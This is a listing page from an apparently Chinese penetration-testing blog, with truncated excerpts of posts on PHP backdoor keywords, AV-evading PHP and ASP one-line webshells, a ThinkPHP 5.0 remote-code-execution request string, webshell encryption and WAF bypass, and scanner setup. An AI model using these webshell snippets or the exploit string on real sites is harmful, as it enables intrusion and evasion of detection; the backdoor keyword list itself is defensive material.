常见的后门关键词

小俊 | 渗透测试 | 2020-10-02
分享给那些安服的苦逼们: 系统命令执行: system, passthru, shell_exec, exec, popen, proc_open 代码执行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13 文件包含: require, requi [阅读全文]
ė564次浏览 60条评论 0

免杀D盾的PHP/ASP/ASPX一句话

小俊 | 渗透测试 | 2020-10-02
php: $m=$_GET[ $m=$_GET['1']; $a=substr($m,0,1); $b=substr($m,1,2); $c=substr($m,2,9999); eval($a.$b.$c); ($a.$b); ?> asp: <% P=request("pass") A=mid(P,1,1 [阅读全文]
ė518次浏览 60条评论 0

WEB安全工具库集合

小俊 | 渗透测试 | 2020-10-02
漏洞及渗透练习平台: WebGoat漏洞练习平台: https://github.com/WebGoat/WebGoat webgoat-legacy漏洞练习平台: https://github.com/WebGoat/WebGoat-Legacy zvuldirll漏洞练习平台: https://github.c [阅读全文]
ė300次浏览 60条评论 0

一次Getshell-ThinkPHP

小俊 | 渗透测试 | 2020-10-01
0x1 _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo 通过phpinfo知道ThinkPHP版本为5.0.20,php版本为7.2.6,php 7以后版本无法使用assert getshell,找到日志包含执行exp! 0x2 _method=__construc [阅读全文]
ė253次浏览 60条评论 0

php小马

小俊 | 渗透测试 | 2020-08-06
ė863次浏览 60条评论 0

jsp小马(上传功能)

小俊 | 渗透测试 | 2020-08-06
error ok " name="url"> [阅读全文]
ė1380次浏览 60条评论 0

php大马免杀绕过检测研究

小俊 | 渗透测试 | 2020-08-06
前言 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。又分大马和小马,大马就是功能比较多的,而小马更像一句话,本文介绍的是免杀PHP大马。 声明 项目脚本仅供学习交流请勿用于非法用途。 本文测试的免杀脚本,并不永久免杀,只要一入特征库,就凉了,更多的是思路。 WAF [阅读全文]
ė955次浏览 60条评论 0

webshell加密-asp大马加密

小俊 | 渗透测试 | 2020-07-28
大家在检测中应该是捡到过别人的Webshell吧?也许有的大马功能很好,于是你就用了,但是你没想过该马可能有后门?现在很多的大马都加密了,打开时候一片乱码,是不是也想加密自己的大马了,加密后的Webshell不仅可以防止别人捡我们的Shell用,还能免杀webshell。ASP木马加密不难,让我们一起踏上大马加密之旅。 一:人工加密 1.主加密函数的编写 1)主解密与解密函数 对大马的加密 [阅读全文]
ė1020次浏览 60条评论 0

php大马免杀技巧之waf|bypass

小俊 | 渗透测试 | 2020-07-28
Part 1 前言   Part 2 免杀 执行代码 eval 或 preg_replace的/e修饰符来执行大马代码。     $a = 'phpinfo();'; eval($a); //eval执行php代码   编码 如果直接去执行代码,是过不了waf的,我们一般需要将大马 [阅读全文]
ė308次浏览 60条评论 0 免杀

Wwvs&Nessus-漏洞扫描工具

小俊 | 渗透测试 | 2020-07-27
扫描工具插件更新比较频繁,这里的docker源也会及时更新~请广大兄弟姐妹们持续关注我们 第一时间获取最新版本 docker命令: pull 拉取下载镜像 docker pull leishianquan/awvs-nessus:v1 启动 docker run -it -d -p 13443:3443 -p [阅读全文]
ė1013次浏览 60条评论 0

Ɣ回顶部